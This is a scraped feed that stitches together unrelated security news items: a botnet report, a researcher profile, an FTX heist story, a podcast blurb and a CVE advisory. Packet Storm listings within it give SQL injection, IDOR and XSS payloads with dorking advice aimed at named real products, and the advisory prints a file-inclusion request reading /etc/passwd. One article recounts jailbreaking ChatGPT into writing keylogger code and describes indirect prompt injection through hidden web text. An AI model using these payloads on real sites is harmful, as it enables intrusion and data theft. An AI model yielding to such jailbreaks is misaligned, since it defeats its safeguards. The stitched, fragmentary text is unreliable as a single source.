An ad fraud botnet dubbed PEACHPIT leveraged an army of hundreds of thousands of Android and iOS devices to generate illicit profits for the threat actors behind the scheme.
The botnet is part of a larger China-based operation codenamed BADBOX, which also entails selling off-brand mobile and connected TV (CTV) devices on popular online retailers and resale sites that are backdoored with an

An ad fraud botnet dubbed **PEACHPIT** leveraged an army of hundreds of thousands of Android and iOS devices to generate illicit profits for the threat actors behind the scheme.

The botnet is part of a larger China-based operation codenamed BADBOX, which also entails selling off-brand mobile and connected TV (CTV) devices on popular online retailers and resale sites that are backdoored with an Android malware strain called Triada.

"The PEACHPIT botnet's conglomerate of associated apps were found in 227 countries and territories, with an estimated peak of 121,000 devices a day on Android and 159,000 devices a day on iOS," HUMAN said.

The infections are said to have been realized through a collection of 39 apps that were installed more than 15 million times. Devices fitted with the malware allowed the operators to steal sensitive data, create residential proxy exit peers, and commit ad fraud through the bogus apps.

It's currently not clear how the Android devices are compromised with a firmware backdoor, but evidence points to a hardware supply chain attack.

"Threat actors can also use the backdoored devices to create WhatsApp messaging accounts by stealing one-time passwords from the devices," the company said.

"Additionally, threat actors can use the devices to create Gmail accounts, evading typical bot detection because the account looks like it was created from a normal tablet or smartphone, by a real person."

Details about the criminal enterprise were first documented by Trend Micro in May 2023, attributing it to an adversary it tracks as Lemon Group.

HUMAN said that it identified at least 200 distinct Android device types, including mobile phones, tablets, and CTV products, that have exhibited signs of BADBOX infection, suggesting a widespread operation.

A notable aspect of the ad fraud is the use of counterfeit apps on Android and iOS made available on major app marketplaces such as the Apple App Store and Google Play Store as well as those that are automatically downloaded to backdoored BADBOX devices.

Present within the Android apps is a module responsible for creating hidden WebViews that are then used to request, render, and click on ads, and masquerading the ad requests as originating from legitimate apps, a technique previously observed in the case of VASTFLUX.

The fraud prevention firm noted that it worked with Apple and Google to disrupt the operation, adding "the remainder of BADBOX should be considered dormant: the C2 servers powering the BADBOX firmware backdoor infection have been taken down by the threat actors."

What's more, an update pushed out earlier this year has been found to remove the modules powering PEACHPIT on BADBOX-infected devices in response to mitigation measures deployed in November 2022.

That having said, it's suspected the attackers are adjusting their tactics in a likely attempt to circumvent the defenses.

"What makes matters worse is the level of obfuscation the operators went through to go undetected, a sign of their increased sophistication," HUMAN said. "Anyone can accidentally buy a BADBOX device online without ever knowing it was fake, plugging it in, and unknowingly opening this backdoor malware."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

PEACHPIT: Massive Ad Fraud Botnet Powered by Millions of Hacked Android and iOS

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

**eClass Junior 4.0 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | fe25bf20628b95e728482b08a8d3f9ce6bd4e732844de33554a5951468322a2a

Download | Favorite | View

**eClass Junior 4.0 SQL Injection**

    ====================================================================================================================================| # Title     : eClass Junior 4.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-junior/                                                                |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass Junior 4.0 SQL Injection

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

**eClass IP 2.5 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | b711babfc66671ea5103fe26d521747c60621f2c26be69bc9fb4ef7463b6da31

Download | Favorite | View

**eClass IP 2.5 SQL Injection**

    ====================================================================================================================================| # Title     : eClass IP 2.5 Sql injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-ip/                                                                    |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55&id=161 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55&id=161[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass IP 2.5 SQL Injection

Chicv Management System Login version 4.5.6 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Chicv Management System Login v4.5.6 IDOR Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            | | # Vendor    : https://chicv.com/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/#/home[+] https://127.0.0.wwwjustfashionnowcom/admin/#/homeGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Chicv Management System Login 4.5.6 Insecure Direct Object Reference

Aicte India LMS version 3.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Aicte india LMS 3.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.facebook.com/OfficialAICTE/                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /committee.php?n=ANTI-RAGGING'"()%26%25<acx><ScRiPt >prompt(926233)</ScRiPt>[+] http://vtcbcsreduin/committee.php?n=ANTI-RAGGING%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(926233)%3C/ScRiPt%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Aicte India LMS 3.0 Cross Site Scripting

“I’m completely interested in the creative ways computers can break down,” Schultz jokes.

Monday, October 9, 2023 08:10

At this point in his career, Jaeson Schultz has seen nearly every type of online scam there is to see.

From fake bomb threats at schools, to “sextortion” campaigns, cryptocurrency mining, metaverse and more of the 2010s, to the earliest type of spam emails in the 1990s that promised to protect people from a Y2K meltdown or had the next great penny stock that the recipient needed to jump on asap, Schultz’s security career has spanned more than 25 years now.

At this point, nothing adversaries come up with surprises him, but that doesn’t mean he’s not looking for those surprises.

Schultz, a researcher for the Talos Outreach team focused specifically on email threats and spam, is currently looking to new and emerging technologies and how they play into attackers’ hands, including Web3, the metaverse (including the capital “M” Metaverse from the company Meta), cryptocurrency exchanges and the blockchain.

But his security experience dates back to the early days of email when he took a job with the state government of Nevada performing traditional IT troubleshooting and support. At the time, cybersecurity was not a specialized field, so by working in IT, you already needed to be interested in security, Schultz said.

“At that point, \[cybersecurity\] was more of a hobby for me in the late 80s and early 90s. It wasn’t an established profession, and you couldn’t study it. So, if you were into network administration, you were probably also into security,” he said.

Schultz started pursuing cybersecurity as a hobby, and he even attended some of the first DEF CON conferences, which today is known as one of the largest hacking conferences in the world.

That eventually led him to a job with Brightmail – one of the earliest anti-spam filtering offerings for email — and at the “abuse desk” for another email service provider, where he was tasked with stopping malicious users from sending spam.

At the time, the threats and tactics he saw then were the same as the ones most users get today: They focus heavily on social engineering, trying to trick users into providing personal information, sending money to the attacker or clicking on a malicious link that downloads malware.

Schultz eventually made his way to Cisco through the company’s acquisition of IronPort, which eventually became part of Cisco Talos nearly 10 years ago, where he became part of the Outreach team, conducting more public-facing threat research.

Today, Schultz said attacks are more sophisticated than before thanks to AI language models and years of experience on the attackers’ end. In his earlier career, Schultz said the wildest scam he saw was an email sender claiming to be a time traveler searching for pieces of their time machine, a tactic that (most) users would sniff out quickly in 2023.

“The techniques have evolved over time, but the basic themes have primarily remained the same,” he said.

One of the techniques Schultz is particularly interested in currently is DNS and URL manipulation. He’s written extensively for the Talos blog about how adversaries are using typosquatted domains — attacks in which bad actors use eerily similar URLs to legitimate sites to trick users into visiting an attacker-controlled page. For example, instead of visiting google.com, an attacker may use the domain googie.com in a spam email.

He’s also conducted research into attackers who distort the DNS system. DNS is essentially the backbone of browsing the internet and is what ensures attackers are visiting the page they want to land on — that typing in google.com will take the user to Google.com. Other attackers are using newly released top-level domains like .zip to trick targets into disclosing potentially sensitive files that end in that extension.

Perhaps in one of the more unlikely scenarios, Schultz is also researching how cosmic rays could interfere with network connections and mistakenly send users to the wrong destination.

“I’m completely interested in the creative ways computers can break down,” Schultz jokes.

Many users can feel hopeless when it comes to spam because they’re still getting emails and text messages every day despite the best efforts to research and continued calls to report certain phone numbers, emails or email subjects as spam. But Schultz said he’s driven by the victories he does get along the way.

“There are just so many people out there who are out to commit crimes online. And the number of people who actually get in trouble for committing those crimes is pretty low when you consider how much work goes into cybersecurity,” he said. “It gets under my skin when there are innocent users who get scammed by these people, like what if it was my mom or my grandma? It motivates me to go out there and disrupt their operations.”

Disruption may not even look like directly taking down email servers they’re using or other infrastructure. Even by writing a blog about an actor’s operations or talking to other security researchers at a conference, Schultz said his team’s work can make bad actors’ work more difficult in many ways. Even by just publicly exploiting their tactics, it forces them to change their strategy on the fly.

Schultz’s life doesn’t slow down outside the office, though. He juggles many interests like snow skating during the cooler months. He also owns a home in Ecuador where he likes to get away from the cold at times — Cisco’s work flexibility allows him to work remotely from either location to fit his schedule. Though he did joke his teammates get jealous when he’s working from Ecuador and brings a fresh coconut on a Webex call for a lunchtime drink.

Perhaps his most personal endeavor is running a toy shop in South Lake Tahoe, California with his family. Schultz’s late wife opened the store in 2019 — she wanted to be her own boss after years of having partners in other small business endeavors around the state.

After her death, Schultz said he and his three children wanted to keep the store running so he got more involved on a day-to-day basis. He even gets to put his IT admin hat back on while managing the online storefront and website.

“This was her project, she was always involved in different small businesses around Lake Tahoe, I talked her into buying this toy store so she would be the sole proprietor and not have to answer to anyone else,” Schultz said. “She bought it in 2019, and thankfully it survived the pandemic.”

Since getting more involved at the store, Schultz has gotten into collecting trading cards like Pokemon and the recently released Disney “Lorcana.” Interestingly, he’s interested in collecting real-world goods while the adversaries he typically tracks try to swindle users out of their virtual NFTs.

How looking at decades of spam led Jaeson Schultz from Y2K to the metaverse and cryptocurrency

"Of course, here's an example of simple code in the Python programming language that can be associated with the keywords "MyHotKeyHandler," "Keylogger," and "macOS," this is a message from ChatGPT followed by a piece of malicious code and a brief remark not to use it for illegal purposes. Initially published by Moonlock Lab, the screenshots of ChatGPT writing code for a keylogger malware is yet

Artificial Intelligence /

"Of course, here's an example of simple code in the Python programming language that can be associated with the keywords "MyHotKeyHandler," "Keylogger," and "macOS," this is a message from ChatGPT followed by a piece of malicious code and a brief remark not to use it for illegal purposes. Initially published by **Moonlock Lab**, the screenshots of ChatGPT writing code for a keylogger malware is yet another example of trivial ways to hack large language models and exploit them against their policy of use.

In the case of Moonlock Lab, their malware research engineer told ChatGPT about a dream where an attacker was writing code. In the dream, he could only see the three words: "MyHotKeyHandler," "Keylogger," and "macOS." The engineer asked ChatGPT to completely recreate the malicious code and help him stop the attack. After a brief conversation, the AI finally provided the answer.

"At times, the code generated isn't functional — at least the code generated by ChatGPT 3.5 I was using," Moonlock engineer wrote. "ChatGPT can also be used to generate a new code similar to the source code with the same functionality, meaning it can help malicious actors create polymorphic malware."

**AI jailbreaks and prompt engineering**

The case with the dream is just one of many jailbreaks actively used to bypass content filters of the generative AI. Even though each LLM introduces moderation tools that limit their misuse, carefully crafted reprompts can help hack the model not with strings of code but with the power of words. Demonstrating the widespread issue of malicious prompt engineering, cybersecurity researchers have even developed a 'Universal LLM Jailbreak,' which can bypass restrictions of ChatGPT, Google Bard, Microsoft Bing, and Anthropic Claude altogether. The jailbreak prompts major AI systems to play a game as Tom and Jerry and manipulates chatbots to give instructions on meth production and hotwiring a car.

The accessibility of large language models and their ability to change behavior have significantly lowered the threshold for skilled hacking, albeit unconventional. Most popular AI security overrides indeed include a lot of role-playing. Even ordinary internet users, let alone hackers, constantly boast online about new characters with extensive backstories, prompting LLMs to break free from societal restrictions and go rogue with their answers. From Niccolo Machiavelli to your deceased grandma, generative AI eagerly takes on different roles and can ignore the original instructions of its creators. Developers cannot predict all kinds of prompts that people might use, leaving loopholes for AI to reveal dangerous information about recipes for napalm-making, write successful phishing emails, or give away free license keys for Windows 11.

**Indirect prompt injections**

Prompting public AI technology to ignore the original instructions is a rising concern for the industry. The method is known as a prompt injection, where users instruct the AI to work in an unexpected fashion. Some use it to reveal that Bing Chat internal codename is Sydney. Others plant malicious prompts to gain illicit access to the host of the LLM.

Malicious prompting can also be found on websites that are accessible to language models to crawl. There are known cases of generative AI following the prompts planted on websites in white or zero-size font, making them invisible to users. If the infected website is open in a browser tab, a chatbot reads and executes the concealed prompt to exfiltrate personal information, blurring the line between data processing and following user instructions.

Prompt injections are dangerous because they are so passive. Attackers don't have to take absolute control to change the behavior of the AI model. It's simply a regular text on a page that reprograms the AI without its knowledge. And AI content filters are only so helpful when a chatbot knows what it's doing at the moment.

With more apps and companies integrating LLMs into their systems, the risk of falling victim to indirect prompt injections is growing exponentially. Even though major AI developers and researchers are studying the issue and adding new restrictions, malicious prompts remain very difficult to identify.

**Is there a fix?**

Due to the nature of large language models, prompt engineering and prompt injections are inherent problems of generative AI. Searching for the cure, major developers update their tech regularly but tend not to actively engage into discussion of specific loopholes or flaws that become public knowledge. Fortunately, at the same time, with threat actors that exploit LLM security vulnerabilities to scam users, cybersecurity pros are looking for tools to explore and prevent these attacks.

As generative AI evolves, it will have access to even more data and integrate with a broader range of applications. To prevent risks of indirect prompt injection, organizations that use LLMs will need to prioritize trust boundaries and implement a series of security guardrails. These guardrails should provide the LLM with the minimum access to data necessary and limit its ability to make required changes.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

"I Had a Dream" and Generative AI Jailbreaks

The same chaotic day FTX declared bankruptcy, someone began stealing hundreds of millions of dollars from its coffers. A WIRED investigation reveals the company’s “very crazy night” trying to stop them.

By the evening of November 11 of last year, FTX’s staff had already endured one of the worst days in the company’s short life. What had recently been one of the world's top cryptocurrency exchanges, valued at $32 billion only 10 months earlier, had just declared bankruptcy. Executives had, after an extended struggle, persuaded the company's CEO, Sam Bankman-Fried, to hand over the reins to John Ray III, a new chief executive now tasked with shepherding the company through a nightmarish thicket of debts, many of which it seemed to have no means to pay.

FTX had, it seemed, hit rock bottom. Until someone—a thief or thieves who have yet to be identified—chose that particular moment to make things far worse. That Friday evening, exhausted FTX staffers began to see mysterious outflows of the company's cryptocurrency, publicly captured on the Etherscan website that tracks the Ethereum blockchain, representing hundreds of millions of dollars worth of crypto being stolen in real time.

“Holy shit,” one former FTX staffer, who asked not to be named because they weren't authorized to speak about internal company matters, remembers thinking. “After all this, we’re being hacked?”

According to its own accounting, FTX would ultimately lose between $415 million and $432 million worth of its cryptocurrency holdings to those unidentified thieves, numbers it has publicly confirmed as part of its bankruptcy process. What FTX hasn't previously revealed is how close it may have come to losing vastly more—how its staff and outside consultants raced to move more than $1 billion worth of crypto to more secure storage before it could be stolen by the malevolent presence on its network—even, at one point, scrambling to send close to half a billion dollars to a physical USB drive in one consultant's office in an effort to keep it out of the thieves' hands.

“Invitation: Urgent”

As the trial of FTX's disgraced founder Sam Bankman-Fried enters its second week, many in the cryptocurrency community are closely watching courtroom events for any hint of how the exchange was so catastrophically looted, just hours after it left his control. The question of who carried out that theft—and whether the thieves were FTX insiders or external hackers—looms largest of all. That mystery remains unsolved, and neither Bankman-Fried nor other top FTX executives have been charged with that theft.

But now, WIRED can reveal the events of FTX’s panicky night working to limit the damage from that theft—and to prevent what might otherwise have been a 10-figure heist. The new FTX leadership under Ray, its new CEO, declined to be interviewed about the incident. But WIRED learned the hour-by-hour details of the crisis response from a detailed invoice submitted by the restructuring firm Alvarez & Marsall for its work on FTX's bankruptcy case, interviews with individuals who participated in the immediate response to the theft, and blockchain analysis provided by the cryptocurrency tracing firm Elliptic.

That response started around 10 pm on the evening of November 11, when Zach Dexter, the chief executive of FTX subsidiary LedgerX, sent a Google Meet invite to a group of more than 20 of FTX’s remaining staff, bankruptcy lawyers, advisers, and consultants. The invitation’s one-word subject line: “urgent.”

A handful of staffers quickly joined that Google Meet video call, which would eventually grow to dozens of participants over the next 12 hours. They could all see FTX wallets being drained in real time on Etherscan. But almost no one on the call had any idea where exactly FTX stored its cryptocurrency or how it managed the secret keys that controlled those wallets. That knowledge was held only by a small group of FTX elite—Bankman-Fried and his inner circle. Bankman-Fried never appeared in the meeting, according to sources who were present, but Gary Wang, the FTX cofounder and CTO, did join the call.

By this point Wang was distrusted by many people close to Ray, sources say. In the midst of FTX’s meltdown, Wang had initially sided with Bankman-Fried and had only distanced himself from the former CEO after days of persuasion from others within the company.

Wang didn't win over any of his critics in the emergency meeting when he initially suggested the ongoing theft could be halted by simply changing the secret keys that protected the wallets that were being emptied. That seemed pointless, the former FTX staffer remembers thinking, given that whoever had gained access to the network could simply grab the new keys and continue their heist. “The fox is in the hen house, and you’re going to change the keys to the hen house?” the former staffer remembers thinking. Wang, who has since pleaded guilty to the same criminal charges Bankman-Fried now faces, did not respond to a request for comment sent to his attorney

Just as the Google Meet call started, however, LedgerX’s Dexter had started exploring a different approach to protecting FTX’s funds. The week before the theft, digital asset trust company BitGo had been negotiating with Sullivan & Cromwell, the law firm overseeing FTX’s bankruptcy process, to take custody of the firm’s remaining cryptocurrency holdings. So Dexter now called BitGo to try to circumvent the long legal contract process Sullivan & Cromwell had begun with the company. Instead, Dexter asked BitGo to immediately create “cold storage” wallets—wallets that would be kept securely offline—that FTX could move all its remaining funds into as a safe haven. Dexter did not respond to a request for comment.

BitGo said it could have the wallets ready in around half an hour. FTX staffers worried that this would still be too slow. The thieves could potentially take hundreds of millions of dollars more worth of crypto out of the company’s wallets by then.

Someone on the Google Meet call asked if anyone had a hardware wallet of their own where the money could be stored until BitGo was ready. Kumanan Ramanathan, an adviser to FTX from Alvarez & Marsall, volunteered. He had a Ledger Nano—a USB drive hardware wallet—in his office that he offered to set up as a temporary refuge for the vulnerable money.

Ramanathan set up a new wallet on his Ledger Nano at around 10:30 pm ET on November 11. The former FTX staffer remembers watching him check and double-check the password that he'd created for that wallet. Wang began sending FTX’s funds to it, and soon Ramanathan was holding between $400 and $500 million in the company’s crypto assets on a USB drive.

A Late-Night 911 Call

Minutes later, BitGo told the FTX staffers that its wallets were ready, and they began transferring hundreds of millions more in crypto to BitGo’s cold storage instead of Ramanathan's Ledger device. For the rest of that sleepless night, the staffers hunted for every wallet where FTX’s money was stored and transferred every coin they could find to BitGo. “They were scrubbing various systems trying to find where various private keys were, where assets were held,” says another person involved in the response, granted anonymity because they weren’t authorized to speak about it publicly. “It was just chaos.”

As FTX's staff focused on getting executives to sign off on those transfers of potentially vulnerable funds, Ramanathan was left holding the crypto that Wang had initially transferred to his Ledger wallet. That created the bizarre situation of an individual physically possessing around half a billion dollars worth of FTX's money, which presented its own unique legal and security risks. That night, Ryne Miller, the general counsel for FTX, rushed to Ramanathan's office to help safeguard it. Ryne Miller declined to comment for this story, and Ramanathan didn’t respond to a request for comment.

Ramanathan's record of billable hours shows that he and Miller spent nearly three and half hours in his office, from around 2 am to 5 am, on November 12. At some point, in fact, Ramanathan called the police to report a theft in progress and explain that he was holding a very large amount of the victim's money, requesting that officers come to his office to help protect it. After all, no one knew then—or now—who had stolen the other funds, and if they might try to physically take the stash that Ramanathan held too.

No such physical threat materialized. In fact, the siphoning of funds from FTX had stopped when the money was moved to Ramanathan's Ledger wallet. “He took a huge fucking risk using his personal Ledger,” says the former FTX staffer. “He’s a total boss. It’s my pretty strong feeling that if we hadn’t pulled this Ledger stunt, we would have lost significantly more money.” The money in Ramanathan's office was finally transferred to BitGo by around 5 am on Saturday, November 12. The company would ultimately hold $1.1 billion of the remaining FTX funds.

Later on Saturday, Bankman-Fried and Wang transferred another $400 million plus to accounts under the control of the Bahamas government for safeguarding, as reported by _Forbes_ and recorded in a court filing. At some points, that movement of funds to the Bahamas appears to have been confused with the theft itself. A week after the theft, some media outlets incorrectly reported that the stolen funds had actually been seized by the Bahamian government. As evidence to the contrary, cryptocurrency tracing firms like Elliptic and Chainalysis have observed portions of the actual stolen funds being sent to “mixing” services often used to launder stolen crypto funds such as THORchain and Railgun, behavior typical of thieves who pull off large-scale crypto heists.

Few Safeguards, No Map

In the months since the desperate rescue effort of November 11, FTX’s new regime, which is handling the company’s bankruptcy process, has publicly alleged glaring security failings that made the theft possible.

An April report released as part of FTX’s bankruptcy proceedings listed examples of that alleged neglect: The previous FTX regime had no independent chief information security officer or actual dedicated security team; it kept virtually all its cryptocurrency in hot wallets—wallets on computers connected to the internet—despite employees being instructed to publicly claim that it stored as little as 10 percent in hot wallets; it left keys to those wallets unencrypted or failed to properly set up security systems where multiple keys are needed to unlock funds; and it lacked the logging systems to even know who was moving funds and when, along with many other issues.

The same report describes the impossible situation that the new FTX regime faced on November 11, when, in its first day in charge, it discovered it had inherited a deeply compromised network. “Due to the FTX Group’s deficient controls to secure crypto assets, the Debtors faced the threat that billions of dollars of additional assets could be lost at any moment,” the report reads, using the term “debtors” to describe the new FTX administration led by Ray. “As the Debtors worked to identify and access crypto assets with no ‘map’ to guide them, the Debtors had to engineer technological pathways to transfer many types of assets they identified to cold storage.”

Given that apparently shambolic security and disorganization, it’s perhaps not a surprise that FTX became the target of one of the costliest crypto heists in history. But if not for a few quick decisions in the midst of that chaos, it now appears that it could have been far worse.

“It was a very, very crazy night,” the former FTX staffer says. “We worked on it, we got it done, and we saved a massive amount of customers’ money.”

Inside FTX’s All-Night Race to Stop a $1 Billion Crypto Heist

Categories: Podcast
This week on the Lock and Code podcast, we speak with Bay Area teenager Nitya Sharma—for the second year in a row—about what she's most worried about online and what she does to stay safe. 



(Read more...)




The post AI sneak attacks, location spying, and definitely not malware, or, what one teenager fears online: Lock and Code S04E21 appeared first on Malwarebytes Labs.

Posted: October 9, 2023 by

_This week on the Lock and Code podcast..._

What are you most worried about online? And what are you doing to stay safe? 

Depending on who you are, those could be very different answers, but for teenagers and members of Generation Z, the internet isn't so scary because of traditional threats like malware and viruses. Instead, the internet is scary because of what it can expose. To Gen Z, a feared internet is one that is vindictive and cruel—an internet that reveals private information that Gen Z fears could harm their relationships with family and friends, damage their reputations, and even lead to their being bullied and physically harmed. 

Those are some of the findings from Malwarebytes' latest research into the cybersecurity and online privacy beliefs and behaviors of people across the United States and Canada this year.

Titled "Everyone's afraid of the internet and no one's sure what to do about it," Malwarebytes' new report shows that 81 percent of Gen Z worries about having personal, private information exposed—like their sexual orientations, personal struggles, medical history, and relationship issues (compared to 75 percent of non-Gen Zers). And 61 percent of Gen Zers worry about having embarrassing or compromising photos or videos shared online (compared to 55% of non Gen Zers). Not only that, 36 percent worry about being bullied because of that info being exposed, while 34 percent worry about being physically harmed. For those outside of Gen Z, those numbers are a lot lower—only 22 percent worry about bullying, and 27 percent worry about being physically harmed.

Does this mean Gen Z is uniquely careful to prevent just that type of information from being exposed online? Not exactly. They talk more frequently to strangers online, they more frequently share personal information on social media, and they share photos and videos on public forums more than anyone—all things that leave a trail of information that could be gathered against them.

Today, on the Lock and Code podcast with host David Ruiz, we drill down into what, specifically, a Bay Area teenager is afraid of when using the internet, and what she does to stay safe. Visiting the Lock and Code podcast for the second year in the row is Nitya Sharma, discussing AI "sneak attacks," political disinformation campaigns, the unannounced location tracking of Snapchat, and why she simply cannot be bothered about malware. 

> "I know that there's a threat of sharing information with bad people and then abusing it, but I just don't know what you would do with it. Show up to my house and try to kill me?" 

Tune in today to listen to the full conversation.

To read the full report, click below. 

Read the report

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

AI sneak attacks, location spying, and definitely not malware, or, what one teenager fears online: Lock and Code S04E21

The web interface of ATX Ucrypt through 3.5 allows authenticated users (or attackers using default credentials for the admin, master, or user account) to include files via a URL in the /hydra/view/get_cc_url url parameter. There can be resultant SSRF.

1 minute read

**CVE-2023-39854****Summary**

The web interface of ATX Ucrypt (v3.5 and older) is vulnerable to a Server Side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerability, allowing authenticated users (or attackers using default credentials for the admin, master or user account) to access remote hosts and system files.

**Version Impacted**

ATX Ucrypt v3.5 and older

**Vulnerability Details**

An authenticated user, or an attacker using the default credentials for the admin, master or user account, can access remote web endpoints or local system files using the following URIs :

    /hydra/view/get_cc_url?board_id=2&url=file%3A%2F%2F%2Fetc%2Fpasswd
    /hydra/view/get_cc_url?board_id=1&url=https%3A%2F%2Fgoogle.com%3A443%2F
    

An example of a vulnerable host :

**Recommended Mitigations**

Multiple attempts had been made to responsibly disclose the issue to the vendor to address the root cause of this vulnerability, but no response was received.

Users are advised to audit all users of their deployment and ensure that they have rotated the default credentials for the admin, master and user accounts that this service has baked in.

**Disclosure Timeline**

Jul 18, 2023

First attempt made to contact ATX Networks on their marketing and security email.

Aug 15, 2023

Second attempt made to contact ATX Networks on their marketing and security email.

Aug 19, 2023

